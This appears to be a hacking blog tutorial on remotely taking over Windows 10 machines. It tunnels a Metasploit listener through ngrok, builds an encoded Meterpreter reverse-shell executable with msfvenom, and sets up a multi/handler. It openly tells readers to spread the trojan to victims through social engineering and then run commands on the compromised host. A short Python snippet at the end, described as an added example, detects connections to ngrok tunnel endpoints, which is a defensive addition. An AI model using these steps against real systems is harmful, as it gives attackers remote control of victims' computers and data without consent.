Hack Windows 10 Remotely Over WAN With Metasploit [No Port Forwarding]

Lots of users have been asking us how to use Metasploit over the Internet (over a WAN).

One way is to set up port forwarding on your router. Today we'll cover another method that lets you run Metasploit over a WAN without any port forwarding, since port forwarding is always a hassle.

Process –
1. Create an account on ngrok.com.
2. Download and configure the Ngrok package on your Kali Linux machine.
3. Start the TCP or HTTP service.
4. Create a payload with Msfvenom.
5. Start the listener with the Metasploit Framework.
6. Spread your Trojan over the Internet.

For the 1st and 2nd steps, see our previous article, where we hacked an Android device using an Ngrok tunnel. We are skipping the registration and installation of Ngrok here, as they were already covered in that article.

Once Ngrok is installed, start the Ngrok TCP service on port 4444 with the following command:

Command: ./ngrok tcp 4444
You can use any port, but we recommend 4444 for this case. Ngrok will print a public forwarding address (a hostname and a port); that hostname and port are what you will use as LHOST and LPORT in the payload below.


The next step is to create the malicious payload with Msfvenom, as follows:

Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your Ngrok URL> LPORT=<Your Ngrok Port> -b "\x00" -e x86/shikata_ga_nai -f exe -o /root/Desktop/<filename>.exe

Here -p stands for payload,
-e stands for encoder,
-o stands for output,
-f stands for file format.

Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. Msfvenom replaced both msfpayload and msfencode as of June 8th, 2015.


Here is a list of the platforms you can pass to the --platform switch:

Cisco or cisco
OSX or osx
Solaris or solaris
BSD or bsd
OpenBSD or openbsd
hardware
Firefox or firefox
BSDi or bsdi
NetBSD or netbsd
NodeJS or nodejs
FreeBSD or freebsd
Python or python
AIX or aix
JavaScript or javascript
HPUX or hpux
PHP or php
Irix or irix
Unix or unix
Linux or linux
Ruby or ruby
Java or java
Android or android
Netware or netware
Windows or windows
mainframe
multi
To list all available encoders, type "msfvenom -l encoders" in your terminal.


When the victim runs the executable (gtavicty.exe in our example), the Meterpreter payload is activated and tries to connect back to your system (LHOST). For that connection to succeed, you need to have the multi-handler running in Metasploit to receive it.

Start the Metasploit Framework by typing "msfconsole" in your terminal.

The module we'll use is the generic handler, and the payload must match the one we built with Msfvenom:

Command: use exploit/multi/handler
Command: set payload windows/meterpreter/reverse_tcp



Now set the LHOST and LPORT. The handler listens locally on port 4444, which is the port Ngrok is forwarding to:

Command: set LHOST 0.0.0.0
Command: set LPORT 4444


Just type "run" in your terminal. Now you can use any social engineering method to spread your malicious executable file over the Internet.

When the victim runs your executable file (gtavicty.exe in our case), a Meterpreter session opens immediately.


Ngrok automatically forwards all traffic arriving at its public TCP endpoint to port 4444 on your local machine, where the handler is listening. Type "sysinfo" to learn more about your target.
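Because the victim's connection goes to Ngrok's public edge rather than to the operator's own IP and port, a defender looking for this setup should key on the destination domain, not on port 4444 (which is only the local side of the tunnel; the public port Ngrok assigns is arbitrary). The following Python is an added example, not part of the original post: it scans constructed network-connection events (the event format and the tunnel hostname suffixes are assumptions) and flags processes connecting to tunnel endpoints.

```python
from dataclasses import dataclass

# Hostname suffixes used by ngrok's public tunnel edges. This list is an
# assumption for the example; extend it with any tunnel providers your
# hosts have no legitimate reason to reach.
TUNNEL_SUFFIXES = (".tcp.ngrok.io", ".ngrok.io", ".ngrok-free.app", ".ngrok.app")

# Constructed sample telemetry in a simple "process dest_host dest_port"
# form, standing in for Sysmon Event ID 3 / EDR network-connection events.
# Note the ngrok-assigned public ports: they are arbitrary, so a rule that
# only looks for 4444 would miss the first tunnel connection entirely.
SAMPLE_EVENTS = """\
chrome.exe www.example.com 443
gtavicty.exe 0.tcp.ngrok.io 17325
OUTLOOK.EXE outlook.office365.com 443
svchost.exe 2.tcp.ngrok.io 4444
"""

@dataclass(frozen=True)
class Alert:
    process: str
    host: str
    port: int

def is_tunnel_host(host: str) -> bool:
    """True if host is (or is under) one of the tunnel-provider domains."""
    h = host.lower().rstrip(".")
    return any(h == s.lstrip(".") or h.endswith(s) for s in TUNNEL_SUFFIXES)

def find_tunnel_connections(log_text: str) -> list[Alert]:
    """Return one Alert per event whose destination is a tunnel endpoint."""
    alerts: list[Alert] = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3 or not parts[2].isdigit():
            continue  # skip malformed lines instead of aborting the scan
        proc, host, port = parts
        if is_tunnel_host(host):
            alerts.append(Alert(proc, host, int(port)))
    return alerts

if __name__ == "__main__":
    for a in find_tunnel_connections(SAMPLE_EVENTS):
        print(f"ALERT {a.process} -> {a.host}:{a.port} (tunnel endpoint)")
```

In real telemetry the process name and parent (a game-named binary or svchost.exe reaching a tunnel edge) is the part worth escalating on, since the destination port alone tells you nothing.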


To find the process ID, type "getpid" in the same terminal.


That's it...
